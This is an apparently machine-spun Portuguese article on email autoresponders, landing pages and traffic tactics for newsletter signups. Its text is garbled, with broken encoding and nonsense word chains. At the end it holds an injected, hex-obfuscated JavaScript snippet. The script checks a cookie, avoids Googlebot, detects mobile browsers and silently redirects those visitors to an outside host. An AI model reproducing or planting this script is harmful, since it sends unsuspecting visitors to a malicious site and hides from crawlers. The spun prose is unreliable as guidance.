Mensagens prA�-escritas O gerenciamento de listas A� realmente simples com autoresponders. O visitante pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio do um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para este seu endereA�o de email do autoresponder (pode configurar esta recado para dizer ao remetente que irA? responder dentro de um determinado perA�odo de tempo ou redirecionA?-lo para 1 endereA�o por email diferente). AlA�m disso, vocA? pode escrever vA?rios e-mails usando antecedA?ncia (no caso por vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? anseia que cada mensagem seja enviada e seu produA�A?o estA? concluA�do. O autoresponder cuida do todo o resto. O prA�-carregamento por mensagens no seu autoresponder A� uma A?tima maneira de agendar um curso do email informativo ou se vocA? quiser enviar vA?rios emails promocionais para este mesmo produto. A maioria destes autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho bastante mais simples. Tudo o que o visitante realmente precisa A� personalizar esses modelos, se necessA?rio, e apA?s carregar as suas prA?prias mensagens.

Landing Page

Muitas pessoas simplesmente usam uma inscriA�A?o para o nosso boletim informativo? espA�cie de caixa em suas pA?ginas principais e esperamos que as pessoas entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no que vocA? tem a expressar. Isso significa que primeiro vocA? tem que educar seus assinantes em potencial para o que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina do destino. Nesta pA?gina, o visitante incluiria uma descriA�A?o do seu boletim informativo, natural como os principais benefA�cios para seus assinantes se inscreverem no boletim informativo (um relatA?rio gratuito a respeito de atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer que seja o seu nicho). A chave aqui A� especialmente convencer o leitor que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, como A� este lugar ideal para obter as melhores informaA�A�es a respeito de esse campo. E, significativo, fornecer 1 formulA?rio chocho para os visitantes preencherem e se inscreverem no seu boletim informativo.

Direcionar trA?fego

AtA� actualmente, vocA? estacionaestaficafixa jazepararpermanecequeda pronto para construir sua prA?pria lista e aumentar as vendas atravA�s de seu autoresponder. Mas primeiro, vocA? precisa direcionar o trA?fego (leia vizinhos reais) para sua pA?gina de fatalidade para de que eles permitam se inscrever em sua prA?pria lista. Veja uma breve discussA?o de algumas tA?ticas que o visitante pode utilizar:

* Escrever e enviar artigos em um diretA?rio do artigo de nicho.

Certifique-se de incorporar sua caixa do refugio no final do artigo, com um texto descrevendo seu curso por e-mail e um link voltando para sua prA?pria pA?gina de destino. Isso A� deveras elementar, porA�m ainda A� surpreendente como poucas pessoas acabam aproveitando-se disso, usando a certeza de que o visitante se concentra nos principais sites abastados em conteA?do do seu nicho ao enviar esses artigos.

* Se o visitante espera lucrar significativamente com seus assinantes (na prA?xima liA�A?o, como vocA? pode vir a calcular o valor da vida eficiente do seu assinante), o visitante pode gastar algum numerA?rio na criaA�A?o de sua prA?pria lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de destino. A chave aqui foi fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego mesmo que segmentado, contudo tambA�m de que vocA? possa obter esses cliques com a certeza de nA?o pagar 1 preA�o inconveniente por clique ( 1 visitante), caso contrA?rio, este processo pode vir a sair atravA�s culatra em vocA?.

* Simples saiba como parece, certifique-se de promover o seu boletim informativo em seu sitio. NA?o se limite a escolher um link em todas as pA?ginas – inclua destemido texto e realmente explique em poucas palavras sitgesworldmagazine.com este que este boletim informativo oferece (como um anA?ncio de PPC).

* Oferecer um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma seA�A?o do seu site (onde vocA? guarda o porreiro conteA?do) ou atA� exatamente um relatA?rio para download. Este A� especialmente de longe o mais comum de que os profissionais de marketing usam para construir sua prA?pria lista.

* Se o visitante tiver um discurso de vendas no seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de riscos para testA?-lo e descobrir se vocA? realmente pode cumprir qualquer reivindicaA�A?o feita no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar estes prA?s e contras e deliberar em muito sobre as decisA�es de compra (especialmente decisA�es de compra caras). Ao oferecer a eles a opA�A?o de se inscrever em seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em suas mentes e estA? em posiA�A?o de ganhar sua prA?pria confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}